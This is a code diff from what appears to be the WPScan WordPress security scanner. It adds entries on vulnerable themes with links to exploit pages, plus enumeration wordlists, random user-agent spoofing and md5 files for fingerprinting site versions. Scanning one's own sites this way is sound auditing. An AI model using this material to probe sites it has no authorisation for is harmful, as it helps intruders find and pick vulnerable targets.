+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="koi">
+    <vulnerability>
+      <title>Koi - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="bizco">
+    <vulnerability>
+      <title>Bizco - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="thememin">
+    <vulnerability>
+      <title>Thememin - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="wigi">
+    <vulnerability>
+      <title>Wigi - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="sidepane">
+    <vulnerability>
+      <title>Sidepane - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="Sixtees">
+    <vulnerability>
+      <title>Sixtees - Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125491/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="linenity">
+    <vulnerability>
+      <title>LineNity 1.20 - download.php imgurl Parameter Remote Path Traversal File Access</title>
+      <references>
+        <osvdb>105767</osvdb>
+        <exploitdb>32861</exploitdb>
+      </references>
+      <type>LFI</type>
+    </vulnerability>
+  </theme>
+
 </vulnerabilities>

data/themes.txt

@@ -1,27 +1,28 @@
-academica
-activetab
+aadya
+abaris
 adamos
+adaptive-flat
 adelle
 admired
 adventure
+advertica-lite
+albinomouse
 aldehyde
 alexandria
 analytical-lite
 anarcho-notepad
-andrina-lite
-appointment
-aquarius
-ascetica
+apprise
+arcade-basic
+arunachala
 aspen
 asteria-lite
 asteroid
 atahualpa
 attitude
-autofocus
+base-wp
 beach
 bearded
-bicubic
-birdsite
+big-city
 bizantine
 bizark
 bizflare
@@ -31,270 +32,267 @@ bizsphere
 bizstudio-lite
 bizway
 blackbird
-blain
 blankslate
 blogbox
-blogly-lite
 blogolife
-blogotron
 blox
-blue-planet
+bluegray
 boldr-lite
 boot-store
 bootstrap-ultimate
-bota
 bouquet
 bresponzive
 brightnews
 bueno
-bushwick
 business-lite
 busiprof
-butterbelly
 buzz
-byblos
-carton
+capture
 catch-box
 catch-everest
 catch-evolution
+catch-kathmandu
 celestial-lite
 chaostheory
 childishly-simple
-chooko-lite
 church
 cirrus
 clean-retina
+cleo
 coller
 colorway
 contango
 coraline
 corpo
-crates
-current
 custom-community
 customizr
 cyberchimps
-d5-socialia
+dark-tt
+dazzling
 decode
 designfolio
+desk-mess-mirrored
 destro
 discover
 dms
+drop
 duena
 dusk-to-dawn
 duster
 dw-minion
+dw-timeline
 dw-wallpress
-dzonia-lite
 eclipse
-elisium
+elegantwhite
+elmax
 engrave-lite
-enough
-envision
 epic
 esell
 esplanade
 esquire
-estate
 evolve
+expert
 expound
 family
-fashionistas
-fastr
-figero
+fifteen
 fine
 firmasite
-fixy
-flounder
+flat
 focus
-forestly
 forever
-formidable-restaurant
-frau
+formation
 fresh-lite
-frisco-for-buddypress
 frontier
 fruitful
-future
 gamepress
 gold
-golden-eagle-lite
+govpress
 graphene
+graphy
 gridbulletin
 gridiculous
 gridster-lite
 hatch
 hazen
-hero
+health-center-lite
+hemingway
 highwind
 hueman
-hypnotist
+i-transform
 iconic-one
 ifeature
+imprint
+independent-publisher
+infinite
+infoway
 inkness
 inkzine
 intuition
 invert-lite
+irex-lite
 iribbon
 isis
-journalism
+itek
+justwrite
+kavya
 klasik
 leatherdiary
-leniy-radius
-limelight
-lizardbusiness
-local-business
-lugada
-magazine-basic
+lingonberry
+linia-magazine
+luminescence-lite
+lupercalia
 magazine-style
 magazino
 mantra
+market
+match
+matheson
 max-magazine
+maxflat-core
 meadowhill
-medicine
 mesocolumn
 mh-magazine-lite
-ming
+midnightcity
 minimatica
 minimize
+mn-flow
 modern-estate
+monaco
 montezuma
 multiloquent
+mywiki
 neuro
-neutro
-newdark
-newlife
-newp
-newtek
+newgamer
+newpro
 next-saturday
 nictitate
 omega
 one-page
-onecolumn
+onetone
 openstrap
 opulus-sombre
 origami
 origin
 oxygen
 p2
+padhang
 pagelines
 parabola
 parallax
 parament
 phonix
-photolistic
-piedmont
 pilcrow
 pilot-fish
 pinbin
 pinboard
 pink-touch-2
-pitch
 platform
 point
 portfolio-press
-pr-pin
+pr-news
 preference-lite
 preus
 primo-lite
-privatebusiness
+promax
 quark
+radiant
+radiate
 raindrops
+rambo
 raptor
 raven
-ready-review
-reddle
-redify
-reizend
-response
+redesign
 responsive
+restaurante
 restaurateur
+restimpo
+retention
 reviewgine-affiliate
 ridizain
-rtpanel
-rundown
 sampression-lite
+semper-fi-lite
 sensitive
+sequel
 serene
 shopping
-sigma
-silverclean-lite
 simple-catch
-simpleo
-simplicity-lite
+simply-vision
+singl
 sixteen
+skt-full-width
 sliding-door
+smpl-skeleton
 snaps
 snapshot
-sorbet
+sneak-lite
+socialize-lite
+spacious
 spartan
 spasalon
 sporty
 spun
+stairway
 stargazer
-startupwp
+start-point
 steira
-strapvert
+storefront-paper
+story
 suevafree
 suffusion
 sugar-and-spice
-suits
-sukelius-magazine
 sundance
 sunny-blue-sky
+sunrain
 sunspot
+superhero
 supernova
 surfarama
 swift-basic
-syntax
 tanzanite
 teal
-techism
 tempera
+temptation
 terrifico
-the-falcon
+the-newswire
 thematic
-themia-lite
 theron-lite
+tiga
+timeturner
 tiny-forge
+tonal
 tonic
-travel-blogger
-travel-lite
 travelify
 twentyeleven
 twentyfourteen
 twentyten
 twentythirteen
 twentytwelve
+typal-makewp005
 unite
+untitled
+uu-2014
 vantage
 venom
 viper
 virtue
-voyage
+vision
+visitpress
+visual
+vryn-restaurant
 ward
 weaver-ii
-weavr
-wiziapp-smooth-touch
-wordplus
-wp-advocate
-wp-barrister
+wilson
 wp-creativix
 wp-opulus
 wp-simple
+wpchimp-countdown
 writr
 x2
 yoko
-zalive
 zbench
-zeebizzcard
-zeebusiness
 zeedynamic
 zeeflow
-zeefocus
 zeeminty
 zeenoble
 zeestyle
-zeesynergie
 zeetasty
-zenon-lite

data/timthumbs.txt

@@ -115,6 +115,7 @@ $wp-plugins$/islidex/js/timthumb.php
 $wp-plugins$/islidex/js/timthumb.phpthumb.php
 $wp-plugins$/islidex/js/timthumb.phptimthumb.php
 $wp-plugins$/jquery-slider-for-featured-content/scripts/timthumb.php
+$wp-plugins$/js-multihotel/includes/timthumb.php
 $wp-plugins$/kc-related-posts-by-category/timthumb.php
 $wp-plugins$/kino-gallery/timthumb.php
 $wp-plugins$/lisl-last-image-slider/timthumb.php

data/user-agents.txt

@@ -0,0 +1,36 @@
+# Windows
+Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5
+Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1
+Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)
+Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
+Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
+Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6
+Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
+Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0
+Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1
+Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
+Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
+Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)
+Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00
+Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
+
+# MAC
+Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13
+Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
+Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10
+
+# Linux
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24
+Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9
+Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0
+Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
+Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00
+Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0

data/vuln.xsd

@@ -40,6 +40,7 @@
       <xs:enumeration value="CSRF"/>
       <xs:enumeration value="SSRF"/>
       <xs:enumeration value="AUTHBYPASS"/>
+      <xs:enumeration value="BYPASS"/>
       <xs:enumeration value="FPD"/>
       <xs:enumeration value="XXE"/>
     </xs:restriction>

data/wp_versions.xml

@@ -10,16 +10,68 @@
 <wp-versions xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:noNamespaceSchemaLocation="wp_versions.xsd">
 
-  <file src="wp-includes/css/buttons-rtl.css">
-    <hash md5="fb062ed92b76638c161e80f4a5426586">
+  <file src="readme.html">
+    <hash md5="84b54c54aa48ae72e633685c17e67457">
+      <version>3.9</version>
+    </hash>
+    <hash md5="c6de8fc70a18be7e5c36198cd0f99a64">
+      <version>3.8.3</version>
+    </hash>
+    <hash md5="e01a2663475f6a7a8363a7c75a73fe23">
+      <version>3.8.2</version>
+    </hash>
+    <hash md5="0d0eb101038124a108f608d419387b92">
       <version>3.8.1</version>
     </hash>
+    <hash md5="38ee273095b8f25b9ffd5ce5018fc4f0">
+      <version>3.8</version>
+    </hash>
+    <hash md5="813e06052daa0692036e60d76d7141d3">
+      <version>3.7.3</version>
+    </hash>
+    <hash md5="b3a05c7a344c2f53cb6b680fd65a91e8">
+      <version>3.7.2</version>
+    </hash>
+    <hash md5="e82f4fe7d3c1166afb4c00856b875f16">
+      <version>3.6.1</version>
+    </hash>
+    <hash md5="477f1e652f31dae76a38e3559c91deb9">
+      <version>3.6</version>
+    </hash>
+    <hash md5="caf7946275c3e885419b1d36b22cb5f3">
+      <version>3.5.2</version>
+    </hash>
+    <hash md5="05d50a04ef19bd4b0a280362469bf22f">
+      <version>3.5.1</version>
+    </hash>
+    <hash md5="066cfc0f9b29ae6d491aa342ebfb1b71">
+      <version>3.5</version>
+    </hash>
+    <hash md5="36b2b72a0f22138a921a38db890d18c1">
+      <version>3.3.3</version>
+    </hash>
+    <hash md5="628419c327ca5ed8685ae3af6f753eb8">
+      <version>3.3.2</version>
+    </hash>
+    <hash md5="c1ed266e26a829b772362d5135966bc3">
+      <version>3.3.1</version>
+    </hash>
+    <hash md5="9ea06ab0184049bf4ea2410bf51ce402">
+      <version>3.0</version>
+    </hash>
+  </file>
+
+  <file src="wp-includes/css/buttons-rtl.css">
+    <hash md5="d24d1d1eb3a4b9a4998e4df1761f8b9e">
+      <version>3.9</version>
+    </hash>
     <hash md5="71c13ab1693b45fb3d7712e540c4dfe0">
       <version>3.8</version>
     </hash>
   </file>
 
   <file src="wp-includes/js/tinymce/wp-tinymce.js.gz">
+    <!-- Note: 3.7.1 has no unique file (the hash below is the same than the 3.7.2) -->
     <hash md5="44d281b0d84cc494e2b095a6d2202f4d">
       <version>3.7.1</version>
     </hash>
@@ -64,13 +116,6 @@
     </hash>
   </file>
 
-  <file src="$wp-content$/themes/twentyeleven/style.css">
-    <!-- same md5 for 3.3.2 -->
-    <hash md5="030d3bac906ba69e9fbc99c5bac54a8e">
-      <version>3.3.1</version>
-    </hash>
-  </file>
-
   <file src="wp-admin/js/common.js">
     <hash md5="4516252d47a73630280869994d510180">
       <version>3.3</version>

dev/wp-versions.rb

@@ -1,237 +0,0 @@
-#!/usr/bin/env ruby
-
-require 'rubygems'
-require 'uri'
-require 'dm-core'
-require 'dm-migrations'
-require 'dm-constraints'
-require 'optparse'
-require 'nokogiri'
-require 'typhoeus'
-
-@db = "#{Dir.pwd}/wp-versions.db"
-
-# return [ Array<String> ] The Stable versions (sorted by number DESC)
-def get_remote_wp_versions
-  versions = []
-  page = Nokogiri::HTML(Typhoeus.get('http://wordpress.org/download/release-archive/').body)
-
-  page.css('.widefat').first.css('tbody tr td:first').each do |node|
-    versions << node.text.strip
-  end
-  versions.reverse
-end
-
-def remove_dir(dir)
-  %x{rm -rf #{dir}}
-end
-
-def download(file_url, dest)
-  %x{wget -q -np -O #{dest} #{file_url} > /dev/null}
-end
-
-def wp_version_zip_url(version)
-  "http://wordpress.org/wordpress-#{version}.zip"
-end
-
-def wp_version_zip_md5(version)
-  Typhoeus.get("#{wp_version_zip_url(version)}.md5").body
-end
-
-def file_md5(file_path)
-  Digest::MD5.file(file_path).hexdigest
-end
-
-def web_page_md5(url)
-  Digest::MD5.hexdigest(Typhoeus.get(url).body)
-end
-
-def download_and_unzip_version(version, dest)
-  dest_zip = "/tmp/wp-#{version}.zip"
-
-  download(wp_version_zip_url(version), dest_zip)
-
-  if $?.exitstatus === 0 and File.exists?(dest_zip)
-    if file_md5(dest_zip) === wp_version_zip_md5(version)
-      remove_dir("#{dest}/wordpress/")
-      unzip(dest_zip, dest)
-
-      return true
-    else
-      raise 'Invalid md5'
-      # Redownload the file ?
-    end
-  else
-    raise 'Download error'
-  end
-end
-
-def unzip(zip_path, dest)
-  %x{unzip -o -d #{dest} #{zip_path}}
-end
-
-parser = OptionParser.new("Usage: ruby #{$0} [options]", 50) do |opts|
-  opts.on('--db PATH-TO-DB', '-d', 'Path to the db, default: wp-versions.db') do |db|
-    @db = db
-  end
-
-  opts.on('--update', '-u', 'Update the db') do
-    @update = true
-  end
-
-  opts.on('--verbose', '-v', 'Verbose Mode') do
-    @verbose = true
-  end
-
-  opts.on('--show-unique-fingerprints WP-VERSION', '--suf', 'Output the unique file hashes for the given version of WordPress') do |version|
-    @version = version
-  end
-
-  opts.on('--search-hash HASH', '--sh', 'Search the hash and output the WP versions & file') do |hash|
-    @hash = hash
-  end
-
-  opts.on('--search-file RELATIVE-FILE-PATH', '--sf', 'Search the file and output the Wp versions & hashes') do |file|
-    @file = file
-  end
-
-  opts.on('--fingerprint URL', 'Fingerprint a remote wordpress blog') do |url|
-    @target_url  = url
-    @target_url += '/' if @target_url[-1,1] != '/'
-  end
-end
-parser.parse!
-
-DataMapper::Logger.new($stdout, @verbose ? :debug : :fatal)
-DataMapper::setup(:default, "sqlite://#{@db}")
-
-class Version
-  include DataMapper::Resource
-
-  has n, :fingerprints, constraint: :destroy
-
-  property :id, Serial
-  property :number, String, required: true, unique: true
-end
-
-class Path
-  include DataMapper::Resource
-
-  has n, :fingerprints, constraint: :destroy
-
-  property :id, Serial
-  property :value, String, required: true, unique: true
-end
-
-class Fingerprint
-  include DataMapper::Resource
-
-  belongs_to :version, key: true
-  belongs_to :path, key: true
-
-  property :md5_hash, String, required: true, length: 32
-
-  # DataMapper does not seem to support ordering by a column in a joining model
-  # Solution found on StackOverflow ("DataMapper: Sorting results though association")
-  def self.order_by_version(direction = :asc)
-    order = DataMapper::Query::Direction.new(version.number, direction)
-    query = all.query
-    query.instance_variable_set('@order', [order])
-    query.instance_variable_set('@links', [relationships['version'].inverse])
-    all(query)
-  end
-end
-
-DataMapper.auto_upgrade!
-
-# Update
-if @update
-  remote_versions = get_remote_wp_versions()
-  puts "#{remote_versions.size} remote versions number retrieved"
-
-  remote_versions.each do |version|
-    unless Version.first(number: version)
-      db_version = Version.create(number: version)
-      version_dir = "/tmp/wordpress/"
-
-      puts "Downloading and unziping v#{version} to #{version_dir}"
-      download_and_unzip_version(version, '/tmp/')
-
-      puts 'Processing Fingerprints'
-      Dir[File.join(version_dir, '**', '*')].reject { |f| f =~ /^*.php$/ || Dir.exists?(f) }.each do |filename|
-        hash      = Digest::MD5.file(filename).hexdigest
-        file_path = filename.gsub(version_dir, '')
-        db_path   = Path.first_or_create(value: file_path)
-        fingerprint = Fingerprint.create(path_id: db_path.id, md5_hash: hash)
-
-
-        db_version.fingerprints << fingerprint
-      end
-      db_version.save
-    else
-      puts "Version #{version} already in DB, skipping"
-    end
-  end
-end
-
-if @version
-  if version = Version.first(number: @version)
-    repository(:default).adapter.select('SELECT md5_hash, path_id, version_id, paths.value AS path FROM fingerprints LEFT JOIN paths ON path_id = id WHERE md5_hash NOT IN (SELECT DISTINCT md5_hash FROM fingerprints WHERE version_id != ?) ORDER BY path ASC', version.id).each do |f|
-      if f.version_id == version.id
-        puts "#{f.md5_hash} #{f.path}"
-      end
-    end
-  else
-    puts "The version supplied: '#{@version}' is not in the database"
-  end
-end
-
-if @hash
-  puts "Results for #{@hash}:"
-  Fingerprint.order_by_version(:desc).all(md5_hash: @hash).each do |f|
-    puts "  #{f.version.number} #{f.path.value}"
-  end
-end
-
-if @file
-  puts "Results for #{@file}:"
-
-  if path = Path.first(value: @file)
-    Fingerprint.order_by_version(:desc).all(path_id: path.id).each do |f|
-      puts "  #{f.md5_hash} #{f.version.number}"
-    end
-  else
-    puts 'File not found (the argument must be a relative file path. e.g: wp-admin/css/widgets.css)'
-  end
-end
-
-if @target_url
-  uri = URI.parse(@target_url)
-
-  Version.all(order: [ :number.desc ]).each do |version|
-    total_urls = version.fingerprints.count
-    matches    = 0
-    percent    = 0
-
-    version.fingerprints.each do |f|
-      url = uri.merge(f.path.value).to_s
-
-      if web_page_md5(url) == f.md5_hash
-        matches += 1
-        puts "#{url} matches v#{version.number}" if @verbose
-      end
-
-      percent = ((matches / total_urls.to_f) * 100).round(2)
-
-      print("Version #{version.number} [#{matches}/#{total_urls} #{percent}% matches]\r")
-    end
-
-    puts
-
-    if percent == 100.0
-      puts "The remote version is #{version.number}"
-      exit
-    end
-  end
-end
-

example.conf.json

@@ -0,0 +1,18 @@
+{
+  "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
+
+    /* Uncomment the "proxy" line to use the proxy
+        SOCKS proxies (4, 4A, 5) are supported, ie : "proxy": "socks5://127.0.0.1:9000"
+        If you do not specify the protocol, http will be used
+    */
+    //"proxy": "127.0.0.1:3128",
+    //"proxy_auth": "username:password",
+
+    "cache_ttl": 600, // 10 minutes, at this time the cache is cleaned before each scan. If this value is set to 0, the cache will be disabled
+
+    "request_timeout": 2000, // 2s
+
+    "connect_timeout": 1000, // 1s
+
+    "max_threads": 20
+}

lib/common/browser.rb

@@ -9,12 +9,10 @@ class Browser
   include Browser::Options
 
   OPTIONS = [
-    :available_user_agents,
     :basic_auth,
     :cache_ttl,
     :max_threads,
     :user_agent,
-    :user_agent_mode,
     :proxy,
     :proxy_auth,
     :request_timeout,
@@ -23,16 +21,22 @@ class Browser
 
   @@instance = nil
 
-  attr_reader :hydra, :config_file, :cache_dir
+  attr_reader :hydra, :cache_dir
+
+  attr_accessor :referer
 
   # @param [ Hash ] options
   #
   # @return [ Browser ]
   def initialize(options = {})
-    @config_file = options[:config_file] || CONF_DIR + '/browser.conf.json'
     @cache_dir   = options[:cache_dir]   || CACHE_DIR + '/browser'
 
-    load_config
+    # sets browser defaults
+    browser_defaults
+    # load config file
+    conf = options[:config_file]
+    load_config(conf) if conf
+    # overrides defaults with user supplied values (overwrite values from config)
     override_config(options)
 
     unless @hydra
@@ -61,6 +65,20 @@ class Browser
     @@instance = nil
   end
 
+  #
+  # sets browser default values
+  #
+  def browser_defaults
+    @max_threads = 20
+    # 10 minutes, at this time the cache is cleaned before each scan. If this value is set to 0, the cache will be disabled
+    @cache_ttl = 600
+    # 2s
+    @request_timeout = 2000
+    # 1s
+    @connect_timeout = 1000
+    @user_agent = "WPScan v#{WPSCAN_VERSION} (http://wpscan.org)"
+  end
+
   #
   # If an option was set but is not in the new config_file
   # it's value is kept
@@ -69,21 +87,20 @@ class Browser
   #
   # @return [ void ]
   def load_config(config_file = nil)
-    @config_file = config_file || @config_file
 
-    if File.symlink?(@config_file)
+    if File.symlink?(config_file)
       raise '[ERROR] Config file is a symlink.'
     else
-      data = JSON.parse(File.read(@config_file))
+      data = JSON.parse(File.read(config_file))
     end
 
     OPTIONS.each do |option|
       option_name = option.to_s
-
       unless data[option_name].nil?
         self.send(:"#{option_name}=", data[option_name])
       end
     end
+
   end
 
   # @param [ String ] url
@@ -101,7 +118,7 @@ class Browser
     params = Browser.append_params_header_field(
       params,
       'User-Agent',
-      self.user_agent
+      @user_agent
     )
 
     if @proxy
@@ -120,6 +137,7 @@ class Browser
       )
     end
 
+    params.merge!(referer: referer)
     params.merge!(timeout: @request_timeout) if @request_timeout
     params.merge!(connecttimeout: @connect_timeout) if @connect_timeout
 

lib/common/browser/options.rb

@@ -3,10 +3,8 @@
 class Browser
   module Options
 
-    USER_AGENT_MODES = %w{ static semi-static random }
-
-    attr_accessor :available_user_agents, :cache_ttl, :request_timeout, :connect_timeout
-    attr_reader   :basic_auth, :user_agent_mode, :proxy, :proxy_auth
+    attr_accessor :cache_ttl, :request_timeout, :connect_timeout
+    attr_reader   :basic_auth, :proxy, :proxy_auth
     attr_writer   :user_agent
 
     # Sets the Basic Authentification credentials
@@ -41,42 +39,6 @@ class Browser
       end
     end
 
-    # Sets the user_agent_mode, which can be one of the following:
-    #   static:      The UA is defined by the user, and will be the same in each requests
-    #   semi-static: The UA is randomly chosen at the first request, and will not change
-    #   random:      UA randomly chosen each request
-    #
-    # UA are from @available_user_agents
-    #
-    # @param [ String ] ua_mode
-    #
-    # @return [ void ]
-    def user_agent_mode=(ua_mode)
-      ua_mode ||= 'static'
-
-      if USER_AGENT_MODES.include?(ua_mode)
-        @user_agent_mode = ua_mode
-        # For semi-static user agent mode, the user agent has to
-        # be nil the first time (it will be set with the getter)
-        @user_agent = nil if ua_mode === 'semi-static'
-      else
-        raise "Unknow user agent mode : '#{ua_mode}'"
-      end
-    end
-
-    # @return [ String ] The user agent, according to the user_agent_mode
-    def user_agent
-      case @user_agent_mode
-      when 'semi-static'
-        unless @user_agent
-          @user_agent = @available_user_agents.sample
-        end
-      when 'random'
-        @user_agent = @available_user_agents.sample
-      end
-      @user_agent
-    end
-
     # Sets the proxy
     # Accepted format:
     #   [protocol://]host:post

lib/common/collections/wp_items/detectable.rb

@@ -17,6 +17,7 @@ class WpItems < Array
       hydra            = browser.hydra
       targets          = targets_items(wp_target, options)
       progress_bar     = progress_bar(targets.size, options)
+      queue_count      = 0
       exist_options    = {
         error_404_hash:  wp_target.error_404_hash,
         homepage_hash:   wp_target.homepage_hash,
@@ -43,8 +44,16 @@ class WpItems < Array
         end
 
         hydra.queue(request)
+        queue_count += 1
+
+        if queue_count >= browser.max_threads
+          hydra.run
+          queue_count = 0
+          puts "Sent #{browser.max_threads} requests ..." if options[:verbose]
+        end
       end
 
+      # run the remaining requests
       hydra.run
       results.sort!
       results # can't just return results.sort because the #sort returns an array, and we want a WpItems

lib/common/common_helper.rb

@@ -32,8 +32,9 @@ LOCAL_FILES_FILE    = DATA_DIR + '/local_vulnerable_files.xml'
 VULNS_XSD           = DATA_DIR + '/vuln.xsd'
 WP_VERSIONS_XSD     = DATA_DIR + '/wp_versions.xsd'
 LOCAL_FILES_XSD     = DATA_DIR + '/local_vulnerable_files.xsd'
+USER_AGENTS_FILE    = DATA_DIR + '/user-agents.txt'
 
-WPSCAN_VERSION       = '2.3'
+WPSCAN_VERSION       = '2.4'
 
 $LOAD_PATH.unshift(LIB_DIR)
 $LOAD_PATH.unshift(WPSCAN_LIB_DIR)
@@ -63,6 +64,14 @@ end
 
 require_files_from_directory(COMMON_LIB_DIR, '**/*.rb')
 
+# Hook to check if the target if down during the scan
+# The target is considered down after 10 requests with status = 0
+down = 0
+Typhoeus.on_complete do |response|
+  down += 1 if response.code == 0
+  fail 'The target seems to be down' if down >= 10
+end
+
 # Add protocol
 def add_http_protocol(url)
   url =~ /^https?:/ ? url : "http://#{url}"
@@ -97,6 +106,7 @@ def banner
   puts '            \\/  \\/   |_|    |_____/ \\___|\\__,_|_| |_|'
   puts
   puts '        WordPress Security Scanner by the WPScan Team '
+  # Alignment of the version (w & w/o the Revision)
   if REVISION
     puts "                    Version #{version}"
   else
@@ -186,3 +196,19 @@ def truncate(input, size, trailing = '...')
       trailing.length >= input.length or size-trailing.length-1 >= input.length
   return "#{input[0..size-trailing.length-1]}#{trailing}"
 end
+
+# Gets a random User-Agent
+#
+# @return [ String ] A random user-agent from data/user-agents.txt
+def get_random_user_agent
+  user_agents = []
+  f = File.open(USER_AGENTS_FILE, 'r')
+  f.each_line do |line|
+    # ignore comments
+    next if line.empty? or line =~ /^\s*(#|\/\/)/
+    user_agents << line.strip
+  end
+  f.close
+  # return ransom user-agent
+  user_agents.sample
+end

lib/common/models/vulnerability/urls.rb

@@ -14,7 +14,7 @@ class Vulnerability
     end
 
     def url_cve(cve)
-      "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-#{cve}"
+      "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-#{cve}"
     end
 
     def url_osvdb(id)
@@ -30,4 +30,4 @@ class Vulnerability
     end
 
   end
-end
+end

lib/common/models/wp_theme/findable.rb

@@ -43,8 +43,6 @@ class WpTheme < WpItem
       end
     end
 
-    # http://code.google.com/p/wpscan/issues/detail?id=141
-    #
     # @param [ URI ] target_uri
     #
     # @return [ WpTheme ]

lib/common/models/wp_timthumb.rb

@@ -3,11 +3,13 @@
 require 'wp_timthumb/versionable'
 require 'wp_timthumb/existable'
 require 'wp_timthumb/output'
+require 'wp_timthumb/vulnerable'
 
 class WpTimthumb < WpItem
   include WpTimthumb::Versionable
   include WpTimthumb::Existable
   include WpTimthumb::Output
+  include WpTimthumb::Vulnerable
 
   # @param [ WpTimthumb ] other
   #

lib/common/models/wp_timthumb/output.rb

@@ -4,7 +4,7 @@ class WpTimthumb < WpItem
   module Output
 
     def output(verbose = false)
-      puts ' | ' + red('[!]') + " #{self}"
+      puts " | #{vulnerable? ? red('[!] Vulnerable') : green('[i] Not Vulnerable')} #{self}"
     end
 
   end

lib/common/models/wp_timthumb/vulnerable.rb

@@ -0,0 +1,9 @@
+# encoding: UTF-8
+
+class WpTimthumb < WpItem
+  module Vulnerable
+    def vulnerable?
+      VersionCompare.is_newer_or_same?(version, '1.34')
+    end
+  end
+end

lib/common/models/wp_user.rb

@@ -12,7 +12,7 @@ class WpUser < WpItem
   # @return [ Array<Symbol> ]
   def allowed_options; [:id, :login, :display_name, :password] end
 
-  # @return [ URI ] The uri to the auhor page
+  # @return [ URI ] The uri to the author page
   def uri
     if id
       return @uri.merge("?author=#{id}")
@@ -54,8 +54,8 @@ class WpUser < WpItem
   # @return [ String ]
   def to_s
